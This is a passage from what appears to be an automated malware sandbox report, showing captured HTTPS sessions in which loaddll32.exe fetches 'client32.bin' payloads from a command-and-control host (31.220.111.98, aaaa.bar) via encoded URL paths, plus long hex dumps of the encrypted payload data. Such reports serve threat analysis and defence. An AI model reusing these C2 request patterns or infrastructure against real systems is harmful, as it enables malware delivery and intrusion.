09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:13 UTC1252INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:13 UTC1268INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:13 UTC1284INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:13 UTC1300INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              18 | 192.168.2.5 | 49968 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:12:13 UTC | 1315 | OUT | GET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
                                                              2021-10-20 13:12:14 UTC | 1315 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:13 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 1849
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:14 UTC1316INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              19 | 192.168.2.5 | 49969 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:12:15 UTC | 1318 | OUT | GET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en
                                                              2021-10-20 13:12:16 UTC | 1318 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:15 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 178758
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Set-Cookie: PHPSESSID=odtoci95m4hvgdsrbq2j2bach6; path=/; domain=.aaaa.bar
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:16 UTC1318INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:16 UTC1334INData Raw: 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad 48 0d 4e 9f 67 4d 93 75 8c 40 39 88 5f 8f c3 b6 ae c1 b3 77 07 58 4a 8e 45 b8 47 ae 5c de 2b ed eb 0d 10 0f ba a7 6a 62 62 23 12 29 2e 35 bb bc 51 44 0b ef 76 63 8f e0 b2 0f bc 50 7e 3e cb 02 20 8c 8d 42 4b 38 46 53 8e 6d f4 f8 e2 95 21 09 75 23 20 5f af b7
                                                              Data Ascii: vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"HNgMu@9_wXJEG\+jbb#).5QDvcP~> BK8FSm!u# _
                                                              2021-10-20 13:12:16 UTC1350INData Raw: 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93 ef 2e ba df ab e9 4a d2 fa d6 04 09 ea c4 5f 8b 7f 3d 5b 34 da 69 e0 c2 25 12 36 56 84 e8 0d c5 0c da eb 25 6e 41 a4 06 88 94 49 21 bb ee c0 23 70 60 51 b2 1c 2a 91 f0 36 d2 dc 76 ff c1 98 7d db 35 a6 03 f4 49 15 d9 c4 81 fd f6 5f 7d 0f 67 9e d1 54 05 f8 7f
                                                              Data Ascii: >03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2.J_=[4i%6V%nAI!#p`Q*6v}5I_}gT
                                                              2021-10-20 13:12:17 UTC1366INData Raw: 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf 38 00 08 af db ca ee f7 a8 d4 e4 9d 6a c1 40 23 50 7b 4c 57 46 6b c0 32 7e c6 7f ed 56 ba 66 2f 2a cb e1 7e b2 be 9e 61 5c ec 0c f3 b4 44 15 72 4b 72 d5 74 52 32 24 1b 01 72 73 3a 2d cc 39 53 67 ce c3 46 2f b5 04 d2 76 50 fc 1f 74 13 2b 4b bf 91 37 05 27 c4
                                                              Data Ascii: PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q8j@#P{LWFk2~Vf/*~a\DrKrtR2$rs:-9SgF/vPt+K7'
                                                              2021-10-20 13:12:17 UTC1382INData Raw: 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d 9c 0c c3 9d fe 5c 92 64 89 a1 d0 fa a3 75 d7 55 4c 6a a7 d1 94 d1 8f 1c 3e a2 09 ac 7b 60 d0 83 ad 42 4e ab ec 59 29 0a 2a 1f e9 60 95 6c 49 ea 7a 2e 96 60 81 72 16 79 a5 4d 7e 07 06 45 08 e2 6c 71 c5 eb 61 b2 5a df 0a f4 6f e7 bc 9d 8d ea 30 3e 9a 93 94 da
                                                              Data Ascii: x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|\duULj>{`BNY)*`lIz.`ryM~ElqaZo0>
                                                              2021-10-20 13:12:17 UTC1398INData Raw: b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08 dd 14 90 45 75 08 25 ed 73 d2 81 6d 12 83 b7 69 3f 61 14 79 65 db e6 0f 88 64 ea f0 54 e9 eb 31 05 70 d4 a0 5f a9 81 74 60 32 79 cd 93 54 32 09 45 9e 7b e7 12 05 3f b1 da b3 7a 35 5c 61 d6 43 6b ee 2f 39 9c 36 e7 db 22 cb aa f7 db 71 81 aa 8f 36 32 9d ea 04
                                                              Data Ascii: kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`oEu%smi?ayedT1p_t`2yT2E{?z5\aCk/96"q62
                                                              2021-10-20 13:12:17 UTC1414INData Raw: fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99 75 9d 62 8a 2b 40 95 20 fa b1 07 ae 20 d2 79 58 97 3a 01 cb 67 c5 61 e8 a0 3a b7 91 7a e4 de 6f 0e 67 7f 0b ba b4 43 63 12 a3 91 7e b2 0c 86 68 83 9a ec 19 98 b1 9f e8 39 50 b5 06 3e 1d 85 a3 c9 f5 ed fe b2 27 dd bd 52 a6 0e b9 ca e3 0c 42 0c e5 3d 29 83 63
                                                              Data Ascii: 39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<kub+@ yX:ga:zogCc~h9P>'RB=)c
                                                              2021-10-20 13:12:18 UTC1430INData Raw: 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd d2 e6 d6 f2 ba de 47 d3 cb 25 0d b2 0a 7e 6b f1 1c e6 81 33 c1 ef ae 35 8b 35 f4 a1 56 97 2f c6 5c 72 0b 1e 9d ef b1 8c 20 0a fe 42 f2 64 5c 0a 96 17 f8 e6 06 40 c1 fe 3d f2 fe e8 40 42 e0 a3 ee a5 99 9e 5e ea e1 53 5a 05 0a 63 50 73 58 e5 6f 13 d1 72 88 a1
                                                              Data Ascii: m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0G%~k355V/\r Bd\@=@B^SZcPsXor
                                                              2021-10-20 13:12:18 UTC1446INData Raw: 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82 fc d0 9c a8 32 b7 dd 06 cf 50 34 72 6b 24 ad d7 ec e0 ac 79 27 1e 9d 26 e2 1e c2 42 2a e8 eb 49 33 b2 8f ad b7 7c 81 79 73 6f f8 af d3 6b 80 7c e1 13 21 f7 60 0b e0 ff 59 a0 f8 81 3e 7f 44 55 87 59 5e 53 c0 3a 96 a9 09 3d 45 f0 e4 5b b7 1d c6 5d 47 01 ed a4
                                                              Data Ascii: Sb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@2P4rk$y'&B*I3|ysok|!`Y>DUY^S:=E[]G
                                                              2021-10-20 13:12:18 UTC1462INData Raw: 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2 9d 67 10 e6 39 cc 37 2e 73 f7 4d 50 e2 6d 58 bd 3a 55 df 58 64 a3 a7 0b 6a d4 6e a1 4d 01 38 6c 37 62 fe 10 18 92 15 6c d7 7a 2b 46 28 01 c7 58 63 82 80 26 be a3 71 09 9d a3 02 22 2a 19 a5 30 a2 08 40 9a 1c 4f 78 9e 17 cd 38 fe dd 3c 7f 14 42 23 ca 13 19 6e
                                                              Data Ascii: [d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@ng97.sMPmX:UXdjnM8l7blz+F(Xc&q"*0@Ox8<B#n
                                                              2021-10-20 13:12:18 UTC1478INData Raw: e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13 3c 13 08 1e 76 10 10 55 a4 fc d1 65 f1 a9 7a 28 bd a7 c6 2e ce 43 31 2e 3d 3b b4 7f b0 2e b5 1b 6c f5 84 98 81 e2 31 55 d2 a7 40 7e 40 c4 a8 e0 2e f9 ef 8c 00 21 f5 26 dd 7c 76 30 ba 5a 76 4f d3 3c 6a e2 da 0f 7c 14 76 42 02 d0 a6 c3 58 3a 01 7c e3 74 fa bc
                                                              Data Ascii: eR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry<vUez(.C1.=;.l1U@~@.!&|v0ZvO<j|vBX:|t


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              2 | 192.168.2.5 | 49827 | 104.26.3.70 | 443 | 
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:08:50 UTC | 11 | OUT | GET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: ad-delivery.net
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:50 UTC | 14 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Oct 2021 13:08:50 GMT
                                                              Content-Type: image/gif
                                                              Content-Length: 43
                                                              Connection: close
                                                              X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw
                                                              Expires: Wed, 20 Oct 2021 13:50:16 GMT
                                                              Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                              ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                              x-goog-generation: 1620242732037093
                                                              x-goog-metageneration: 5
                                                              x-goog-stored-content-encoding: identity
                                                              x-goog-stored-content-length: 43
                                                              x-goog-hash: crc32c=cpEfJQ==
                                                              x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                              x-goog-storage-class: MULTI_REGIONAL
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                              Age: 132
                                                              Cache-Control: public, max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Accept-Ranges: bytes
                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
